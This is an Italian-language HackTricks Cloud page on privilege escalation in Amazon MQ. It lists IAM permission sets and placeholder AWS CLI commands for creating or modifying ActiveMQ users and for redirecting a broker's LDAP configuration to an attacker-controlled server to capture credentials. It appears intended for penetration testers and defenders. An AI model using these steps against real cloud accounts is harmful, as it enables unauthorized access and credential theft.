AWS - MQ Privesc
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al 💬 Discord group o al telegram group o seguici su Twitter 🐦 @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
MQ
Per maggiori informazioni su MQ consulta:
mq:ListBrokers, mq:CreateUser
Con questi permessi puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
Potenziale Impatto: Accedere a informazioni sensibili navigando attraverso ActiveMQ
mq:ListBrokers, mq:ListUsers, mq:UpdateUser
Con questi permessi puoi creare un nuovo utente in un ActimeMQ broker (questo non funziona in RabbitMQ):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
Impatto potenziale: Accedere a informazioni sensibili navigando tramite ActiveMQ
mq:ListBrokers, mq:UpdateBroker
Se un broker utilizza LDAP per l’autorizzazione con ActiveMQ, è possibile modificare la configurazione del server LDAP utilizzato per indirizzarla su uno controllato dall’attaccante. In questo modo l’attaccante sarà in grado di rubare tutte le credenziali inviate tramite LDAP.
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
Se in qualche modo riuscissi a trovare le credentials originali utilizzate da ActiveMQ, potresti eseguire un MitM, rubare le creds, usarle sul server originale e inviare la risposta (forse basterebbe riutilizzare le credentials rubate per farlo).
Potential Impact: Rubare le credentials di ActiveMQ
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al 💬 Discord group o al telegram group o seguici su Twitter 🐦 @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
HackTricks Cloud

